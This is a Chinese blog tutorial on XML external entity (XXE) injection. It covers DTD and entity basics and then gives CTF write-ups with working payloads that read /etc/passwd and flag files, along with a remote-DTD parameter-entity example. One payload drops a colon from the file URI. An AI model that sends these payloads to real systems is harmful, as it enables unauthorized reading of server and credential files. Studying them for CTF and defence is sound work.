XML外部实体注入(XEE)的原理和应用_xee攻击
赞
踩
文章目录
XXE注入
一、XML简介
二、XML实体
三、CTF中XEE攻击
XXE注入
XXE注入全称是xml external entity 注入,也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。
一、XML简介
XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如:
<?xml version="1.0"?> <!--XML文档定义-->
<!DOCTYPE message [ <!--定义该文档为message类型-->
<!ELEMENT message(username,password)<!-- 定义message有两个元素-->
<!ELEMENT username(#PCDATA)> <!-- 定义username元素为#PCDATA类型 -->
<!ELEMENT password(#PCDATA)>
]>
1
2
3
4
5
6
上面的DTD就定义了XML的根元素为message,然后根元素下面有一些子元素,后面的XML就要像如下的方式来书写。
<message>
<username>root</username>
<password>123</password>
</message>
1
2
3
4
二、XML实体
上面的<!ELEMENT>中定义的是元素,也就是定义了对应XML中的标签。还可以在DTD中定义XML实体。XML实体可以看作一个变量,到时候可以在XML中通过&符号来引用。
XML可分为外部实体和内部实体。首先来看内部实体:
示例:
<? xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY tst "test">
]>
1
2
3
4
5
其中元素定义的ANY说明接受任何元素,同时定义了一个xml实体(<! ENTITY>标签),这样就可以在XML文档中这样来写
<message>
<user>&tst;</user>
</message>
1
2
3
外部实体
示例:
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
<user>&xxe;</user>
</message>
1
2
3
4
5
6
7
这里用 &实体名; 引用实体,在DTD中定义,在XML文档中引用。
通过上面的总结我们知道可以将实体分为外部实体和内部实体。但是实际上从另一个角度来开,还可以分为通用实体和参数实体。
1.通用实体:
用 &实体名; 引用的实体,他在DTD 中定义,在 XML 文档中引用
示例:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Profile [<!ENTITY file SYSTEM "file:///etc/passwd">]
<Profile>
<msg>&file;</msg>
</Profile>
1
2
3
4
5
2.参数实体
(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用
(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体
(3)和通用实体一样,参数实体也可以外部引用
示例:
<!ENTITY % an-element "<!ELEMENT mytag (subtag)>">
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">
%an-element; %remote-dtd;
1
2
3
三、CTF中XEE攻击
1.题目地址:Jarvis http://web.jarvisoj.com:32794/
打开链接,输入数据后抓包:
发现传的是JSON数据,考虑修改一下上传文件类型为XML类型。构造外部实体,实现XXE攻击。将ContentType字段改为:application/xml,然后在请求内容中加上如下的payload:
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY shell SYSTEM "file///etc/passwd">
]>
<message>&shell;</message>
1
2
3
4
5
发现了/home/ctf路径。改一下file的路径:file:///home/ctf/flag.txt。即可得到flag
2.题目地址:https://buuoj.cn/challenges (Fake XML cookbook)
抓包后,发现上传的是XML类型的数据
直接构造XML外部实体,读flag。payload如下:
<?xml version="1.0"?>
<!DOCTYPE user[
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>passwd</password></user>
1
2
3
4
5
参考文章
https://xz.aliyun.com/t/3357
https://www.freebuf.com/vuls/175451.html
————————————————
版权声明:本文为CSDN博主「izwqing」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/iczfy585/article/details/108269451
